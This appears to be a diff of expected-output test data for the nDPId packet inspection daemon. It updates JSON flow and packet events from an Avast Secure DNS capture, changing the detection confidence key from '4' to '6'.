-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482998213,"flow_last_seen":1625482998333,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073336,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483010449,"flow_last_seen":1625483010570,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482998213,"flow_last_seen":1625482998333,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073336,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":67,"packets-processed":66,"total-skipped-flows":0,"total-l4-payload-len":7095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":33,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":33,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":176,"global_ts_msec":1625556065479} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1625556065479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556065479,"pkt":"eJS0JASgYDjgxTWgCABFAABDHAQAAH8Rgy7AqAJktdYjldqMAbsAL9sh3zMBAAABAAAAAAAAATIJU2VDVXJlRG5zBUF2QVNUA0NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1625556067432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556067432,"pkt":"eJS0JASgYDjgxTWgCABFAABDHAgAAH8RgyrAqAJktdYjlci3AbsAL6ehZCkBAAABAAAAAAAAATIJc0VDVXJlRE5zBWF2YVNUA2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1625556067553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625556067553,"pkt":"YDjgxTWgeJS0JASgCABFAADMazAAADIRgHm11iOVwKgCZAG7yLcAuCAQZCmBgAABAAEAAAAAATIJc0VDVXJlRE5zBWF2YVNUA2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511643408,"flow_last_seen":1625511643529,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511645426,"flow_last_seen":1625511645546,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511643408,"flow_last_seen":1625511643529,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511645426,"flow_last_seen":1625511645546,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1625556100118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556100118,"pkt":"eJS0JASgYDjgxTWgCABFAABDGwQAAH8RhC7AqAJktdYjlfy8AbsAL4gY7+wBAAABAAAAAAAAATIJU2VjdXJlRG5TBWFWYVNUA0NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1625556100236,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625556100236,"pkt":"YDjgxTWgeJS0JASgCABFAADMlbkAADIRVfC11iOVwKgCZAG7\/LwAuACH7+yBgAABAAEAAAAAATIJU2VjdXJlRG5TBWFWYVNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1625556102196,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556102196,"pkt":"eJS0JASgYDjgxTWgCABFAABDGwgAAH8RhCrAqAJktdYjldUVAbsAL6kdFo8BAAABAAAAAAAAATIJU0VjVXJlRG5TBUFWYXN0A0NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1625556102314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625556102314,"pkt":"YDjgxTWgeJS0JASgCABFAADMmGEAADMRUki11iOVwKgCZAG71RUAuCGMFo+BgAABAAEAAAAAATIJU0VjVXJlRG5TBUFWYXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":7779,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":37,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":37,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":194,"global_ts_msec":1625558730271} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1625558730271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625558730271,"pkt":"eJS0JASgYDjgxTWgCABFAABDLFIAAH8RcuDAqAJktdYjldXoAbsALw4O0KsBAAABAAAAAAAAATIJU0VDdXJlZE5zBUFWYVNUA2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1625558730389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625558730389,"pkt":"YDjgxTWgeJS0JASgCABFAADM7EMAADIR\/2W11iOVwKgCZAG71egAuIZ80KuBgAABAAEAAAAAATIJU0VDdXJlZE5zBUFWYVNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1625558735043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625558735043,"pkt":"eJS0JASgYDjgxTWgCABFAABDLFYAAH8RctzAqAJktdYjlcAAAbsAL9\/2VKsBAAABAAAAAAAAATIJc0VjVVJFZE5TBUFWQVN0A2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 